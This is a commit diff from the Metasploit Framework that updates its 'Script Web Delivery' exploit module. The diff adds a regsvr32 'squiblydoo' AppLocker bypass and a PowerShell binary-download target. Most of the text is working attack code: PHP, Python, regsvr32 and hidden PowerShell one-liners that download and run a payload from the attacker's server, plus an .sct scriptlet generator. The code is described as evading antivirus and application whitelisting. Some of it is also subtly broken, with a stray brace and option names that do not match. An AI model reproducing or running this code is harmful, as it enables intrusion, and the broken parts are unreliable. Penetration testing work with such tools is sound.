Land #8933, Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)

bug/bundler_fix
Jeffrey Martin 2017-10-25 12:44:04 -05:00
commit 4999606b61
3 changed files with 124 additions and 35 deletions

View File

@ -139,7 +139,7 @@ Gem::Specification.new do |spec|
# Library for Generating Randomized strings valid as Identifiers such as variable names
spec.add_runtime_dependency 'rex-random_identifier'
# library for creating Powershell scripts for exploitation purposes
spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"]
spec.add_runtime_dependency 'rex-powershell', ["< 0.1.78"]
# Library for processing and creating Zip compatbile archives
spec.add_runtime_dependency 'rex-zip'
# Library for parsing offline Windows Registry files

View File

@ -8,6 +8,7 @@ require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HttpServer
@ -16,21 +17,33 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'Script Web Delivery',
'Description' => %q(
This module quickly fires up a web server that serves a payload.
The provided command will start the specified scripting language interpreter and then download and execute the
payload. The main purpose of this module is to quickly establish a session on a target
machine when the attacker has to manually type in the command himself, e.g. Command Injection,
RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not
write to disk so it is less likely to trigger AV solutions and will allow privilege
escalations supplied by Meterpreter. When using either of the PSH targets, ensure the
payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute
x86 payloads on x64 machines.
The provided command which will allow for a payload to download and execute.
It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe
for bypassing application whitelisting. The main purpose of this module is to quickly establish
a session on a target machine when the attacker has to manually type in the command:
e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution.
This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege
escalations supplied by Meterpreter.
When using either of the PSH targets, ensure the payload architecture matches the target computer
or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.
Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting.
The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included
PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute)
can occur on the same port.
"PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
'Ben Campbell',
'Chris Campbell' # @obscuresec - Inspiration n.b. no relation!
'Chris Campbell', # @obscuresec - Inspiration n.b. no relation!
'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee)
'Trenton Ivey', # AppLocker MSF Module (kn0)
'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
],
'DefaultOptions' =>
{
@ -38,10 +51,11 @@ class MetasploitModule < Msf::Exploit::Remote
},
'References' =>
[
['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],
['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'],
],
'Platform' => %w(python php win),
'Targets' =>
@ -57,16 +71,60 @@ class MetasploitModule < Msf::Exploit::Remote
['PSH', {
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
}],
['Regsvr32', {
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
}],
['PSH (Binary)', {
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 19 2013'
))
register_advanced_options(
[
OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]),
OptString.new('PSHBinary-PATH', [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]),
OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]),
], self.class
)
end
def primer
php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}'));")
python = %Q(python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}');exec(r.read());")
regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll)
print_status("Run the following command on the target machine:")
case target.name
when 'PHP'
print_line("#{php}")
when 'Python'
print_line("#{python}")
when 'PSH'
psh = gen_psh("#{get_uri}", "string")
print_line("#{psh}")
when 'Regsvr32'
print_line("#{regsvr}")
when 'PSH (Binary)'
psh = gen_psh("#{get_uri}", "download")
print_line("#{psh}")
end
end
def on_request_uri(cli, _request)
print_status('Delivering Payload')
if target.name.include? 'PSH'
if _request.raw_uri =~ /\.sct$/
psh = gen_psh("#{get_uri}", "string")
data = gen_sct_file(psh)
elsif target.name.include? 'PSH (Binary)'
data = generate_payload_exe
elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32'
data = cmd_psh_payload(payload.encoded,
payload_instance.arch.first,
remove_comspec: true,
@ -75,27 +133,55 @@ class MetasploitModule < Msf::Exploit::Remote
else
data = %Q(#{payload.encoded})
end
if _request.raw_uri =~ /\.sct$/
print_status("Handling .sct Request")
send_response(cli, data, 'Content-Type' => 'text/plain')
else
print_status("Delivering Payload")
send_response(cli, data, 'Content-Type' => 'application/octet-stream')
end
end
def primer
url = get_uri
print_status('Run the following command on the target machine:')
case target.name
when 'PHP'
print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"")
when 'Python'
print_line('Python:')
print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"")
when 'PSH'
def gen_psh(url, *method)
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
if method.include? 'string'
download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
else
# Random filename to use, if there isn't anything set
random = "#{rand_text_alphanumeric 8}.exe"
# Set filename (Use random filename if empty)
filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']
# Set path (Use %TEMP% if empty)
path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}')
# Join Path and Filename
file = %Q(echo (#{path}+'\\#{filename}'))
# Generate download PowerShell command
download_string = Rex::Powershell::PshMethods.download_run(url, file})
end
download_and_run = "#{ignore_cert}#{download_string}"
print_line generate_psh_command_line(
noprofile: true,
# Generate main PowerShell command
return generate_psh_command_line(noprofile: true,
windowstyle: 'hidden',
command: download_and_run
)
end
def rand_class_id
"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}"
end
def gen_sct_file(command)
%{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>}
end
end

View File

@ -8,6 +8,9 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HttpServer
include Msf::Module::Deprecated
deprecated(Date.new(2018, 3, 5), 'exploits/multi/script/web_delivery.rb')
def initialize(info = {})
super(update_info(info,